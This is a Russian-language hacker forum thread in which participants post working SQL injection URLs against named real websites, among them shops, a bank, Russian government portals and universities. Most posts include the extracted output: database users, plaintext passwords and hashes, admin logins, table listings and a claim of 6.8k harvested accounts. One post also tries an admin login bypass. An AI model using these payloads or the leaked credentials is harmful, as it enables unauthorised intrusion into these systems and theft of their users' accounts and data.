Антибоян нахлабучило, холм прикрыл мой сайт, потому что я юзал фтпщник под свои личные нужды.. так что придётся немного подождать. + к этому у neval'а неплохая получилась конструкция, возможно, у него антибоян будет базироваться. З.ы. кстати, неплохо было бы с 220 по эту страничку собрать инъекты, так что стучите в асю, кто поможет
Code: http://www.cspr.info/index.php?view=statti&sub_id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6/* cspr_cspr:cspr_cspr@localhost:4.1.21-standard-log Форум: Code: http://www.cspr.info/index.php?view=statti&sub_id=-1+union+select+1,2,concat(username,char(58),user_password),4,5,6+from+phpbb_users+limit+1,1/* admin:34d7b21152ce773f71ddcc88c99d4231:::shutnick Сайт: Code: http://www.cspr.info/index.php?view=statti&sub_id=-1+union+select+1,2,concat(login,char(58),password),4,5,6+from+users/* admin:forgetit
Антибоян: http://antiboyansql.narod.ru http://antiboyansql.narod.ru/sql.txt http://hack-shop.org.ru/sql.php ---------------------------------------------------------------- Constantine, я тебе личку отправил: логин и пароль к сайту.
Code: http://kava.lviv.ua/event/index.php?id=-1+union+select+1,2,concat_ws(0x3a,login,password,id)+from+admin/*
http://www.secureworldexpo.com/ - PR 5 Вот те блин и secureworldexpo ! Да... Code: http://www.secureworldexpo.com/events/index.php?id=-228+union+select+1,concat(username,1,password),3,4+from+login/* User: secureworld Password: secure503 Аднинка: http://www.secureworldexpo.com/admin
Code: http://www.sodalitas.it/news.php?ID=-174+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+user/* sodal2002:admin.sodal2002 Code: http://tutvsesvoi.ru/index.php?do=info&iID=-10+union+select+1,version(),3,4,5,6/*
http://www.ninsis.ru/content.php?id=50'+union+select+55,2,3,4,user(),6,7,database()/* Мля.. моя первая SQL-инъекция... =)
вот тебе ещё по втоему сайту) Code: http://www.ninsis.ru/content.php?id=50'+union+select,concat(user_id,0x3a,username,0x3a%20,user_password,0x3a,user_email,0x3a,user_icq),3,4,%205,6+from+phpbb_users+limit+1,600/* и ещё))) Code: http://www.ninsis.ru/content.php?id=50'+union+select+50,concat(user_id,0x3a,username,0x3a%20,user_password,0x3a,user_email,0x3a,user_icq),3,%205,6+from+php_users+limit+1,600/*
Эстония PHP: http://matkarajad.maaturism.ee/index.php?id=85+union+select+1,2,3,4,5,6--&pg=object http://www.union.ee/index.php?id='+union+select+1,2,3,4,5,6,7,8,9,10/* http://surf.triip.ee/index.php?ID=10+union+select+1,2,3,4,5,6,7,8,9-- stmarys-ca.edu PHP: http://stmarys-ca.edu/news_events/news/viewstory.php?id=-24+union+select+1,2,3,4,user,6,7,password,9,10,11,12,13,14+from+mysql.user/* login:root pass:456791a12266fca0
http://www.solntseva.com/biblio_detail.php?id=-16+union+select+1,concat(user_id,0x3a,username,0x3a%20,user_password,0x3a,user_email,0x3a,user_icq),3+from+phpbb_users+limit+1,1/*
Code: http://www.unixdoc.ru/index.php?mode=2&podmode=1&arcicle_id=39+and+ascii(lower(substring(version(),1,1)))=0x35 MySQL 5.x Code: http://www.unixdoc.ru/index.php?mode=2&podmode=1&arcicle_id=-1+union+select+1/* Улыбнуло =) Пользователь: http://www.unixdoc.ru/index.php?mode=2&podmode=1&arcicle_id=39+and+user()=char(0x75,0x6e,0x69,0x78,0x64,0x6f,0x63,0x40,0x6c,0x6f,0x63,0x61,0x6c,0x68,0x6f,0x73,0x74) unixdoc@localhost
Code: http://www.citroen-forum.nl/markt/advertentie.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x203a20,username,user_password,user_email),12,13,14,15,16,17+from+citroen_users+limit+0,50/* 6.8k акков
mssql: Code: http://shop.nag.ru/core.asp?main=catalog&act=page&id=1034+or+1=@@version-- table: Code: __STITLES Accounts Action_Transition ActionOnTransitions Admins Advert afftypes agent AllowedStatus AllowedTransitions AlternativeProducts Banlog Banner BannerLocations banners BizRateCategories BizRateRules BizRateTemplates BLP BP BundleItems BundleItemsView BundleProductIDs Bundles campaign Cards Categories CategoryMap clicks ClicksReportTemp Contacts Countries Departments Discounts dtproperties Feedback FeedUploads GroupDiscounts Groups ImageTypes Import impress Invoice ItemState Links MailBlackList MailBroadcastResults MailBroadcasts MailDictionary MailExtractors MailListEmails MailLists MailTemplates ManualChanges ManuallyChangedValues MemberDiscounts MemberGroups Members MemberTransactions MenuItems Messages ModelDocument OrderDiscounts OrderLines OrderLog Orders OrderStatus OrderStatuses OrderTypes OrdStatusHistory Page PageLog PagePerms Pages params PaymentActions payments PermisionMenu PlatformCategories Platforms Priority ProductCategories ProductImages ProductItems ProductPlatforms Products ProductsTitles Publishers QualityDeductions QualitySettings QuantityDeductions QuantitySettings Ratings Reasons RelatedProducts ReportsTemp SearchQuery Sections Settings Shipping ShippingClasses ShippingMethods ShippingRates Shopcart ShopcartDiscounts ShopcartRequirements SiteCMS SiteTemplates States StatusHistory Substitutions SupplyRequest sysconstraints syssegments Tasks TitlesCategoriesPlatforms TradeInRequirements Vendors WaitList WordIndex XLSImport mysql(агрохимбанк): Code: http://www.axbank.ru/library/comments.html?id=-1)+sql table: Code: _a_event _a_finance _a_history _a_license _a_management _a_mission _a_response _a_struct _about _action_g _c_cards _c_cassa _c_consult _c_converse _c_credit _c_deposit _c_econom _c_fact _c_inkass _c_paper _c_safe _c_super _c_system _c_uprav _corporate _cr_m_credit _cr_s_credit _cr_scheta _cred _exchanges _f_cards _f_change 
_f_credit _f_inet _f_paper _f_paper_b _f_paper_d _f_perevod _f_perevod_c _f_perevod_e _f_perevod_w _f_privat _f_safe _f_text _f_vklad _fiz _k_forvard _k_org _k_quality _k_text _klientz _l_acts _l_books _l_comments _l_img _l_publics _l_types _l_video _library _m_action _m_action_text _m_dirs _m_prav _m_revision _open_support _p_announce _p_faq _p_news _p_quest _p_release _p_report _p_themes _paper_b _paper_d _press _rec _s_filials _s_otdel _s_sales _s_vacancy _s_vacancy_text _t_tarif _t_types _tablesTree _tarifs _v_sroks _v_types _vacancy bdict categories crossdict dict dict00 dict01 dict02 dict03 dict04 dict05 dict06 dict07 dict08 dict09 dict0A dict0B dict0C dict0D dict0E dict0F dict10 dict11 dict12 dict13 dict14 dict15 dict16 dict17 dict18 dict19 dict1A dict1B dict1C dict1D dict1E dict1F dict20 dict21 dict22 dict23 dict24 dict25 dict26 dict27 dict28 dict29 dict2A dict2B dict2C dict2D dict2E dict2F dict30 dict31 dict32 dict33 dict34 dict35 dict36 dict37 pict38 dict39 dict3A dict3B dict3C dict3D dict3E dict3F dict40 dict41 dict42 dict43 dict44 dict45 dict46 dict47 dict48 dict49 dict4A dict4B dict4C dict4D dict4E dict4F dict50 dict51 dict52 dict53 dict54 dict55 dict56 dict57 dict58 dict59 dict5A dict5B dict5C dict5D dict5E dict5F dict60 dict61 dict62 dict63 dict64 dict65 dict66 dict67 dict68 dict69 dict6A dict6B dict6C dict6D dict6E dict6F dict70 dict71 dict72 dict73 dict74 dict75 dict76 dict77 dict78 dict79 dict7A dict7B dict7C dict7D dict7E dict7F dict80 dict81 dict82 dict83 dict84 dict85 dict86 dict87 dict88 dict89 dict8A dict8B dict8C dict8D dict8E dict8F dict90 dict91 dict92 dict93 dict94 dict95 dict96 dict97 dict98 dict99 dict9A dict9B dict9C dict9D dict9E dict9F dictA0 dictA1 dictA2 dictA3 dictA4 dictA5 dictA6 dictA7 dictA8 dictA9 dictAA dictAB dictAC dictAD dictAE dictAF dictB0 dictB1 dictB2 dictB3 dictB4 dictB5 dictB6 dictB7 dictB8 dictB9 dictBA dictBB dictBC dictBD dictBE dictBF dictC0 dictC1 dictC2 dictC3 dictC4 dictC5 dictC6 dictC7 dictC8 dictC9 dictCA 
dictCB dictCC dictCD dictCE dictCF dictD0 dictD1 dictD2 dictD3 dictD4 dictD5 dictD6 dictD7 dictD8 dictD9 dictDA dictDB dictDC dictDD dictDE dictDF dictE0 dictE1 dictE2 dictE3 dictE4 dictE5 dictE6 dictE7 dictE8 dictE9 dictEA dictEB dictEC dictED dictEE dictEF dictF0 dictF1 dictF2 dictF3 dictF4 dictF5 dictF6 dictF7 dictF8 dictF9 dictFA dictFB dictFC dictFD dictFE dictFF links qcache qinfo qtrack server srvinfo url urlinfo wrdstat ещё один шоп: Code: http://shop.rosastro.ru/starlist.php?sozv=2&select=-1'+union+select+1,2,3,concat(user,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16+from+mysql.user/* root: admin:42cf говру: Code: http://ntc.duma.gov.ru/bpa/docview.phtml?bpaid=1&t=T&code=-1+union+select+concat(user,0x3a,password)+from+mysql.user/* Code: http://pravo.tambov.gov.ru/soft_na/bpa/docview.phtml?bpaid=2&code=-1+union+select+concat(user,0x3a,password)+from+mysql.user/* без коментариев) Code: http://shop.nastolki.ru/item.php?id=234','lala','=)))','<?php include($page)?>','tyc','tyc','tyc')/* желтая пресса: Code: http://old.zhizn.ru/comment.php?link=stars&id=-1+union+select+concat(0x3d,user(),version(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*&page=2&per_page=3 би-два: Code: 
http://www.bdva.ru/funclub_details.phtml?id=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_name+not+in+('phpbb_config','phpbb_topics','COLLATIONS','COLLATION','CHARACTER_SET','APPLICABILITY','COLUMNS','COLUMN_PRIVILEGES','KEY_COLUMN_USAGE','ROUTINES','SCHEMATA','SCHEMA_PRIVILEGES','STATISTICS','TABLES','TABLE_CONSTRAINTS','TABLE_PRIVILEGES','COLLATION_CHARACTER_SET_APPLICABILITY','TRIGGERS','PROFILING','USER_PRIVILEGES','VIEWS','CHARACTER_SETS','arhiv_tbl','biologia_tbl','banner_tbl','credits_tbl','country_tbl','creviews_tbl','chtivo_tbl','disk_tbl','faces_tbl','diary_tbl','fanclub_tbl','faq_answers_tbl','fanclub_activity_tbl','faq_questions_tbl','filmographia_tbl','forum_topic_tbl','forum_authors_tbl','grafik_tbl','golos_tbl','friends_tbl','guest_authors_tbl','guest_comments_tbl','guest_online_tbl','handmade_index_tbl','guest_topic_tbl','handmade_tbl','history_tbl','hotnews_tbl','hudozestva_index_tbl','hudozestva_tbl','indexnews_tbl','humor_tbl','links_tbl','konkurs_tbl','nevorob_tbl','oboi_index_tbl','oboi_tbl','photoalbum_index_tbl','photoalbum_tbl','premeri_tbl','probap_tbl','radio_log','radio_users','raznoe_tbl','reviews_tbl','shop_tbl','sideaccords_tbl','sides_tbl','sidedisk_tbl','sidesong_text_tbl','sidetracks_tbl','song_text_tbl','tour_tbl','tracks_tbl','version_tbl','unoff_tbl','vfocuse_index_tbl','vfocuse_tbl','videohronika_tbl','accords_tbl','phpbb_auth_access','phpbb_banlist','phpbb_confirm','phpbb_disallow','phpbb_forum_prune','phpbb_forums','phpbb_posts','phpbb_groups','phpbb_posts_text','phpbb_privmsgs','phpbb_privmsgs_text','phpbb_ranks','phpbb_search_results','phpbb_search_wordlist','phpbb_search_wordmatch','phpbb_sessions','phpbb_sessions_keys','phpbb_smilies','phpbb_themes','phpbb_themes_name','phpbb_topics_watch','phpbb_user_group','phpbb_users','phpbb_vote_desc','phpbb_vote_results','phpbb_vote_voters','phpbb_words','phpbb_categories')/* мобила: Code: 
http://www.mobila.com.ua/news.php?razdel=999+union+select+1,2,3/* хостинг1: Code: http://web.privat-online.net/news.php?id=-1'+union+select+1,table_name,3,4,5+from+information_schema.tables+where+table_name+not+in+('COLLATIONS','COLLATION','CHARACTER_SET','APPLICABILITY','COLUMNS','COLUMN_PRIVILEGES','KEY_COLUMN_USAGE','ROUTINES','SCHEMATA','SCHEMA_PRIVILEGES','STATISTICS','TABLES','TABLE_CONSTRAINTS','TABLE_PRIVILEGES','COLLATION_CHARACTER_SET_APPLICABILITY','TRIGGERS','PROFILING','USER_PRIVILEGES','VIEWS','CHARACTER_SETS','articles','newsrus','dbusers','newsukr','webnews')/* хостинг2: Code: http://www.realsweb.com/news.php?item=-1+union+select+1,2,3,table_name,5,6+from+information_schema.tables+where+table_name+not+in+(0x434f4c4c4154494f4e53,0x434f4c4c4154494f4e5f4348415241435445525f5345545f4150504c49434142494c495459,0x434f4c554d4e53,0x434f4c554d4e5f50524956494c45474553,0x4b45595f434f4c554d4e5f5553414745,0x50524f46494c494e47,0x524f5554494e4553,0x534348454d415441,0x534348454d415f50524956494c45474553,0x53544154495354494353,0x5441424c4553,0x5441424c455f434f4e53545241494e5453,0x5441424c455f50524956494c45474553,0x5452494747455253,0x555345525f50524956494c45474553,0x5649455753,0x4348415241435445525f53455453)/*
http://www.ghdhair.com/go/shop-uk/product_info.php?products_id=-1+union+select+VERSION()/* http://www.turkuaz.us/content.php?magId=-34+union+select+1,2,3,4,VERSION(),6,7/* http://right-web.net/right-host/rus/news.shtml?id=-45+union+select+1,2,3,4,5,6,7+from+users/*
Code: http://www.fsi.cbi.uni-erlangen.de/userinfo.php?id=-14+union+select+1,2,convert(concat_ws(0x3a,name,password,email)+using+latin1)+from+fscbi_user/* Решил найти админку, обратился к http://www.fsi.cbi.uni-erlangen.de/admin.php Мне любезно сообщили, что такой нет, и предложили верный путь: http://www.fachschaft.cbi.uni-erlangen.de/admin/login.php Ну что за чудаки =)) Попробовал залогиниться дедовским методом 1' or 1=1/* Получил отказище, но зато узнал, где лог. Code: http://www.fsi.cbi.uni-erlangen.de/userinfo.php?id=-14+union+select+1,2,convert(concat_ws(0x3a,action,time,userid,type)+using+latin1)+from+fscbi_log/* В общем, ничего особенного, но забавно